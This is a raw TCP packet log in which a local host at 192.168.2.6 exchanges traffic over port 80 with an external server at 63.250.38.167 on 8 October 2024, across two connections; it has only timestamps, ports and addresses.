Oct 8, 2024 11:30:49.141490936 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141500950 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141518116 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141529083 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141539097 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141539097 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141568899 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141577959 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141592979 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141608000 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141617060 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141617060 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141618013 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141640902 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141650915 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141666889 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141675949 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141685963 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141685963 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141694069 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141705036 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141731024 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141733885 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141733885 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141743898 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141762018 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141772032 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141788006 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141797066 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141801119 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141801119 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141815901 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141827106 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141844988 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141855955 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141855955 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141875029 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141885042 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141902924 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141906023 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141922951 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141942024 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141952038 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141969919 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141969919 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141972065 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141992092 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142004013 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142016888 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142030001 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142035007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142035007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142050028 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142060041 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142075062 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142086983 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142093897 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142093897 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142098904 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142122984 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142132998 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142149925 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142149925 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142152071 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142163038 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142168045 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142174959 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142183065 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142196894 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142206907 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142208099 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142208099 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142220974 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142239094 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142241955 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142250061 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.142298937 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.142298937 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145062923 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145077944 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145097017 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145106077 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145129919 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145155907 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145155907 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145189047 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145200014 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145217896 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145227909 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145246983 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145256996 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145275116 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145276070 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145276070 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145287037 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145312071 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145312071 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145313025 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145324945 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145344019 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145349979 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145356894 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145375967 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145389080 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145390987 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145411015 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145421028 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145421028 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145436049 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145448923 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145456076 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145467043 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145477057 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145493984 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145504951 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145520926 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145520926 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145526886 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145546913 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145558119 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145565987 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145565987 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145576000 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145587921 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145601034 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145601988 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145625114 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145636082 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145652056 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145663977 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145663977 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145663977 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145685911 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145695925 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145713091 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.145734072 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145734072 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.145818949 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.251897097 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251909018 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251929998 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251939058 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251945019 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251969099 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251970053 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.251981974 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251997948 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.251998901 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252007961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252012968 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252017975 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252022028 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252027988 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252048969 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252057076 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252067089 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252074003 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252085924 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252094030 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252099037 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252099037 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252118111 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252129078 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252137899 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252145052 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252145052 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252161026 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252161980 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252192974 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252199888 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252211094 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252219915 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252224922 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252233982 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252253056 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252254009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.252264977 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.252301931 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:52.723408937 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:56.623440981 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:56.628339052 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:56.628398895 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:56.629498005 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:56.634370089 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223357916 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223376989 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223392010 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223440886 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223452091 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223464966 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223500013 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.223551989 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223560095 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223576069 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223587036 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.223612070 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.223612070 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.223671913 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.228411913 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.228423119 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.228435040 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.228444099 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.228473902 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.228509903 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.312565088 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312577009 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312587976 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312597990 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312608004 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312680006 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.312680006 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.312695980 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312777042 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.312915087 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312923908 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312933922 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.312978983 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.313062906 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313071966 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313085079 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313124895 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.313124895 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.313957930 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313968897 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313978910 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.313988924 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314044952 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.314044952 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.314455032 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314465046 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314475060 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314503908 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.314634085 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314644098 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314652920 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.314680099 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.314734936 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.315320015 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.315330029 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.315377951 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.317557096 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.373164892 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.400928020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.400939941 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.400952101 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401019096 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.401093006 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401103020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401113033 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401123047 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401134014 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.401148081 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.401192904 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.401192904 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.402915001 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.402925014 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.402997017 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403080940 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403091908 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403103113 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403112888 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403145075 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403145075 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403259993 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403269053 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403279066 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403284073 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403294086 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403305054 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403314114 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403325081 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403343916 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403343916 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403403997 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403425932 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403640032 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403650999 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403659105 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403673887 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403683901 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403769016 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403769016 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403769970 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.403778076 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403788090 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403798103 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.403846025 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.404565096 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404577971 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404591084 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404750109 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.404750109 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.404764891 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404777050 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404788017 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404798985 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.404828072 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.404844999 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.404906988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405461073 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405472994 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405483961 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405495882 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405523062 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.405616999 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.405633926 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405644894 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405657053 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405668020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.405706882 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.405706882 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.408682108 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.408691883 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.408725023 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.450547934 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.489948034 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.489980936 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.489998102 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490017891 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490044117 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490058899 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490077019 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490093946 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490108967 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490125895 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490140915 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490156889 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490170956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490170956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490170956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490204096 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490221024 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490237951 CEST	80	49950	63.250.38.167	192.168.2.6
